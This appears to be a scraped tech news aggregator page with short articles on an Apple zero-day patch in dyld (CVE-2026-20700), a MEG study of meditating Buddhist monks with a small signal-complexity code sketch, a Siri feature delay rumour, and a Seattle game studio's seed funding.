What’s more, with a good GDP forecast for 2026 following a strong 2025, we can expect these numbers to continue climbing, with tens of thousands of Singaporeans joining the S$10,000 club each year.

  • Read other articles we’ve written on Singapore’s job landscape here.

Featured Image Credit: tang90246/ depositphotos


Tech

Apple fixes zero-day flaw used in ‘extremely sophisticated’ attacks



Apple has released security updates to fix a zero-day vulnerability that was exploited in an “extremely sophisticated attack” targeting specific individuals.

Tracked as CVE-2026-20700, the flaw is an arbitrary code execution vulnerability in dyld, the Dynamic Link Editor used by Apple operating systems, including iOS, iPadOS, macOS, tvOS, watchOS, and visionOS.

Apple’s security bulletin warns that an attacker with memory write capability may be able to execute arbitrary code on affected devices.


Apple says it is aware of reports that the flaw was exploited in the same incidents as CVE-2025-14174 and CVE-2025-43529, two flaws fixed in December.

“An attacker with memory write capability may be able to execute arbitrary code,” reads Apple’s security bulletin.


“Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.”

Apple says Google’s Threat Analysis Group discovered CVE-2026-20700. The company did not provide any further details about how the vulnerability was exploited.

Affected devices include:

  • iPhone 11 and later
  • iPad Pro 12.9-inch (3rd generation and later)
  • iPad Pro 11-inch (1st generation and later)
  • iPad Air (3rd generation and later)
  • iPad (8th generation and later)
  • iPad mini (5th generation and later)
  • Mac devices running macOS Tahoe

Apple fixed the vulnerability in iOS 18.7.5, iPadOS 18.7.5, macOS Tahoe 26.3, tvOS 26.3, watchOS 26.3, and visionOS 26.3.

While Apple says the flaw was exploited only in targeted attacks, all users are advised to install the latest updates to protect their devices.


This is the first Apple zero-day fixed in 2026, with the company fixing seven in 2025.



Tech

Study of Buddhist Monks Finds Meditation Alters Brain Activity


If you’ve ever considered practicing meditation, you might believe you should relax, breathe, and empty your mind of distracting thoughts. Novices tend to think of meditation as the brain at rest, but a new international study concludes that this ancient practice is quite the opposite: Meditation is a state of heightened cerebral activity that profoundly alters brain dynamics.

Researchers from the University of Montreal and Italy’s National Research Council recruited 12 monks of the Thai Forest Tradition at Santacittārāma, a Buddhist monastery outside Rome. In a laboratory in Chieti-Pescara, scientists analyzed the brain activity of these meditation practitioners using magnetoencephalography (MEG), technology capable of recording with great precision the brain’s electrical signals.

The study focused on two classical forms of meditation. Samatha is a technique of sustained attention on a specific object, often steady breathing, with the aim of stabilizing the mind and reaching a deep state of calm and concentration. Vipassana is based on equanimous observation of sensations, thoughts, and emotions as they arise, in order to develop mental clarity and a deeper understanding of the experience.

“With Samatha, you narrow your field of attention, somewhat like narrowing the beam of a flashlight; with Vipassana, on the contrary, you widen the beam,” explains Karim Jerbi, professor of psychology at the University of Montreal and one of the study’s coauthors. “Both practices actively engage attentional mechanisms. While Vipassana is more challenging for beginners, in mindfulness programs the two techniques are often practiced in alternation.”


The researchers recorded multiple indicators of brain dynamics, including neural oscillations, measures of signal complexity, and parameters related to so-called “criticality,” a concept borrowed from statistical physics that has been applied to neuroscience for 20 years. Criticality describes systems that operate efficiently on the border between order and chaos, and in neuroscience, it is considered a state optimal for processing information in a healthy brain.

“A brain that lacks flexibility adapts poorly, while too much chaos can lead to malfunction, as in epilepsy,” Jerbi explained in a press release. “At the critical point, neural networks are stable enough to transmit information reliably, yet flexible enough to adapt quickly to new situations. This balance optimizes the brain’s processing, learning, and response capacity.”

During the experiment, the monks’ brain activity was recorded by a high-resolution MEG system as they alternated from one type of meditation to the other with brief periods of rest in between. The data were then processed with advanced signal analysis and machine learning tools to extract different indicators of neural complexity and dynamics.
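To give a flavor of what “signal complexity” can mean here, the sketch below computes one widely used family of measures, a Lempel-Ziv-style count of novel patterns in a binarized signal. The study’s actual pipeline (MEG preprocessing, criticality estimators, machine learning) is far richer:

import numpy as np

def lempel_ziv_complexity(bits):
    """Count novel 'words' in a simple LZ78-style parse of a bit string."""
    s = "".join(map(str, bits))
    seen, word, count = set(), "", 0
    for ch in s:
        word += ch
        if word not in seen:   # first time this pattern appears
            seen.add(word)
            count += 1
            word = ""
    return count

rng = np.random.default_rng(0)
signal = rng.normal(size=1000)                    # stand-in for one MEG channel
bits = (signal > np.median(signal)).astype(int)   # binarize around the median
print(lempel_ziv_complexity(bits))                # higher = less repetitive signal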

Striking a Balance

Results published in the journal Neuroscience of Consciousness show both forms of meditation increase the complexity of brain signals compared to a brain at rest. This finding suggests the brain in meditation does not simply calm down but rather enters a dynamic state rich with information. At the same time, the researchers observed widespread reductions in certain parameters linked to the global organization of neural activity.


One of the most striking findings came from the analysis of the criticality deviation coefficient, which showed a clear distinction between Samatha and Vipassana. This indicates that, although both practices increase brain complexity, they do so through different dynamic configurations, consistent with their subjective experiences. In other words, Vipassana brings the practitioner closer to the balance of stability and flexibility, while Samatha produces a somewhat more stable and focused state. According to the researchers, the closer the brain gets to this critical state of balance, the more responsively and efficiently it functions. This is reflected, for example, in a greater capacity to switch tasks or to store information.


Tech

Siri testing isn't going well, new features probably won't ship in iOS 26.4


A report suggests that internal testing hasn’t been going well with the new Siri and some features, including access to personal data, will likely be pushed back to iOS 26.5 and iOS 27.

iPhone 17 Pro Max is an AI powerhouse waiting on Apple’s updates

The reporting around artificial intelligence and Apple has been a never-ending treasure trove of doomcasting for the company, but vague details of delays regarding unannounced products are nothing new. After Apple reassessed the Apple Intelligence features promised during WWDC 2024, it paused personalized intelligence in the hope that it could be better refined the following year.

According to the report from Bloomberg, anonymous tipsters with knowledge of the development of the upgraded Apple Intelligence suggest some features may be delayed yet again. These include Siri’s ability to access a user’s personal data, though the details on that delay are iffy.

Rumor Score: 🤔 Possible


Tech

Seattle gaming startup Ironwood Studios raises $4 million for its next project



The Seattle-area independent production studio behind the hit video game Pacific Drive raised $4 million in seed funding.

The round, led by Lifelike Capital, is aimed at financing the next game from Redmond, Wash.-based Ironwood Studios.

Pacific Drive, released in Feb. 2024 for PlayStation, Xbox, and PC and published by Kepler Interactive, is a “driving survival” game set in 1998, where players build, fix, and customize an old station wagon in order to survive a science-warped zone in the rural Pacific Northwest.

Notably, PD features no traditional combat; instead, you must outwit and evade environmental dangers while using scrap metal and scavenged parts to keep your car in working order. (You can read GeekWire’s review of Pacific Drive here.)

“As a team we are very thankful for the opportunity to keep making games and at the same time so incredibly excited for what the future of Ironwood holds,” Cassandra Dracott, Ironwood’s CEO and creative director, said in a press release. “This funding round points us towards the best version of that future and we’re thrilled to work alongside Lifelike Capital to make it a reality.”


GeekWire reached out to Ironwood Studios for further comment.

As per an official release from Ironwood, PD has sold over 1.5 million units since its debut, in addition to being released on both the Xbox Game Pass and PlayStation Plus subscription services. Ironwood released a paid expansion for PD, Whispers in the Woods, in October.

In addition, filmmaker James Wan (Saw, The Conjuring) acquired the TV rights for Pacific Drive in 2024, though there has been no further public information about the project.

